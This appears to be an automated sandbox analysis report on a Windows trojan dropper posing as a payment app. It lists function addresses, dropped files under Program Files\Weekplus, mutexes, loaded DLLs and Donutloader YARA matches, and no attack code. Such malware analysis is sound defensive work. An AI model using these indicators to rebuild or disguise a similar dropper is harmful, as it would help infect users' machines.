Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDBE20C	8_2_00007FF89FDBE20C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDBB1C0	8_2_00007FF89FDBB1C0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDB1990	8_2_00007FF89FDB1990
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDB9158	8_2_00007FF89FDB9158
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDA7920	8_2_00007FF89FDA7920
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B03CD9C	8_2_000001B59B03CD9C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B03D5A8	8_2_000001B59B03D5A8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B03BEC0	8_2_000001B59B03BEC0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B03D178	8_2_000001B59B03D178
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B040854	8_2_000001B59B040854
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B03E05C	8_2_000001B59B03E05C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0C1530	8_2_000001B59B0C1530
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0CA9E0	8_2_000001B59B0CA9E0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0C9F30	8_2_000001B59B0C9F30
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0E0620	8_2_000001B59B0E0620
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0D6690	8_2_000001B59B0D6690
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0C26D0	8_2_000001B59B0C26D0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0C9710	8_2_000001B59B0C9710
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0C7550	8_2_000001B59B0C7550
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0CA580	8_2_000001B59B0CA580
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0DF600	8_2_000001B59B0DF600
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0C5B80	8_2_000001B59B0C5B80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0CCBA0	8_2_000001B59B0CCBA0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0C63A0	8_2_000001B59B0C63A0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0C7AA0	8_2_000001B59B0C7AA0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0D11B7	8_2_000001B59B0D11B7
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0D28B0	8_2_000001B59B0D28B0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B0D2F60	8_2_000001B59B0D2F60
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B8758F0	16_2_00007FF78B8758F0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B874790	16_2_00007FF78B874790
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B8885D0	16_2_00007FF78B8885D0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B87A190	16_2_00007FF78B87A190
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B872370	16_2_00007FF78B872370
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B8906F0	16_2_00007FF78B8906F0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B88FA68	16_2_00007FF78B88FA68
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B889520	16_2_00007FF78B889520
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B876D20	16_2_00007FF78B876D20
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B890950	16_2_00007FF78B890950
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B882950	16_2_00007FF78B882950
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB750B8	16_2_00007FF8BFB750B8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB680B0	16_2_00007FF8BFB680B0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB7E000	16_2_00007FF8BFB7E000
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB6FFE8	16_2_00007FF8BFB6FFE8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB7A7B4	16_2_00007FF8BFB7A7B4
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB866F8	16_2_00007FF8BFB866F8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB755B8	16_2_00007FF8BFB755B8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB65D80	16_2_00007FF8BFB65D80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB6FD80	16_2_00007FF8BFB6FD80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB774C0	16_2_00007FF8BFB774C0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB66C20	16_2_00007FF8BFB66C20
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB6FAFC	16_2_00007FF8BFB6FAFC
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB80300	16_2_00007FF8BFB80300
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB82320	16_2_00007FF8BFB82320
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB832D8	16_2_00007FF8BFB832D8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB77A7C	16_2_00007FF8BFB77A7C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB7E20C	16_2_00007FF8BFB7E20C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB7B1C0	16_2_00007FF8BFB7B1C0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB71990	16_2_00007FF8BFB71990
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB79158	16_2_00007FF8BFB79158
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB67920	16_2_00007FF8BFB67920
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC19D5A8	16_2_00000115DC19D5A8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC19CD9C	16_2_00000115DC19CD9C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC19BEC0	16_2_00000115DC19BEC0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC1A0854	16_2_00000115DC1A0854
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC19E05C	16_2_00000115DC19E05C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC19D178	16_2_00000115DC19D178
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5B1530	16_2_00000115DC5B1530
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5B9F30	16_2_00000115DC5B9F30
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5BA9E0	16_2_00000115DC5BA9E0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5B7AA0	16_2_00000115DC5B7AA0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5B5B80	16_2_00000115DC5B5B80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5B63A0	16_2_00000115DC5B63A0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5BCBA0	16_2_00000115DC5BCBA0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5B7550	16_2_00000115DC5B7550
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5BA580	16_2_00000115DC5BA580
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5CF600	16_2_00000115DC5CF600
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5D0620	16_2_00000115DC5D0620
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5B26D0	16_2_00000115DC5B26D0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5C6690	16_2_00000115DC5C6690
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5C2F60	16_2_00000115DC5C2F60
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5B9710	16_2_00000115DC5B9710
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5C28B0	16_2_00000115DC5C28B0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC5C11B7	16_2_00000115DC5C11B7
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C150E5CD9C	22_2_000002C150E5CD9C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C150E5D5A8	22_2_000002C150E5D5A8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C150E5D178	22_2_000002C150E5D178
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C150E60854	22_2_000002C150E60854
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C150E5E05C	22_2_000002C150E5E05C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C150E5BEC0	22_2_000002C150E5BEC0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151241530	22_2_000002C151241530
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151249F30	22_2_000002C151249F30
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C15124A9E0	22_2_000002C15124A9E0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C15124CBA0	22_2_000002C15124CBA0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C1512463A0	22_2_000002C1512463A0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151245B80	22_2_000002C151245B80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151260620	22_2_000002C151260620
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C15125F600	22_2_000002C15125F600
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151256690	22_2_000002C151256690
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151247550	22_2_000002C151247550
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C15124A580	22_2_000002C15124A580
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C1512426D0	22_2_000002C1512426D0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151249710	22_2_000002C151249710
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151252F60	22_2_000002C151252F60
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C1512511B7	22_2_000002C1512511B7
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C151247AA0	22_2_000002C151247AA0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C1512528B0	22_2_000002C1512528B0

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: String function: 00007FF8B9160A00 appears 85 times
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: String function: 00007FF8B91603D0 appears 214 times
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: String function: 00007FF8B9160990 appears 69 times
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: String function: 00007FF8B915E6E0 appears 40 times
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: String function: 00007FF78B87DB30 appears 44 times
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: String function: 00007FF78B87DAE0 appears 42 times
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: String function: 00007FF89FDA8B90 appears 36 times
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: String function: 00007FF8BFB68B90 appears 36 times

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5892 -s 3584

Source: #U6c47#U8054#U652f#U4ed8.exe	Static PE information: No import functions for PE file found
Source: APP.exe.0.dr	Static PE information: No import functions for PE file found

Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000054B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs #U6c47#U8054#U652f#U4ed8.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000054B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs #U6c47#U8054#U652f#U4ed8.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005481000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLMNK.exe, vs #U6c47#U8054#U652f#U4ed8.exe
Source: #U6c47#U8054#U652f#U4ed8.exe	Binary or memory string: OriginalFilenameXMM556.exe0 vs #U6c47#U8054#U652f#U4ed8.exe

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.2915314802.000001B59AFF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.2915076303.000001B5996E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000016.00000002.3916863440.000002C150E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000016.00000002.3916671618.000002C14F4A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000010.00000002.3326654982.00000115DA868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3969038874.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000010.00000002.3326948864.00000115DC150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.4040565455.000000001DF16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Program Files\Weekplus\mpclient64.dat, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Program Files\Weekplus\mpclient.dat, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal92.troj.evad.winEXE@29/33@3/4

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Code function: 8_2_000001B59B0C3080 GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,swprintf,swprintf,

8_2_000001B59B0C3080

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Code function: 8_2_000001B59B0C3470 CoInitializeEx,CoCreateInstance,swprintf,

8_2_000001B59B0C3470

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File created: C:\Program Files\Weekplus

Jump to behavior

Source: C:\Program Files\Weekplus\APP.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\APP.exe.log

Jump to behavior

Source: C:\Program Files\Weekplus\APP.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5892
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7072
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6308
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Mutant created: \Sessions\1\BaseNamedObjects\vrdashboard.exe
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5752
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{exeName}_Mutex

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z2nopvl.nk3.ps1

Jump to behavior

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: #U6c47#U8054#U652f#U4ed8.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U6c47#U8054#U652f#U4ed8.exe	Virustotal: Detection: 28%
Source: #U6c47#U8054#U652f#U4ed8.exe	ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File read: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: amsi.dll	Jump to behavior
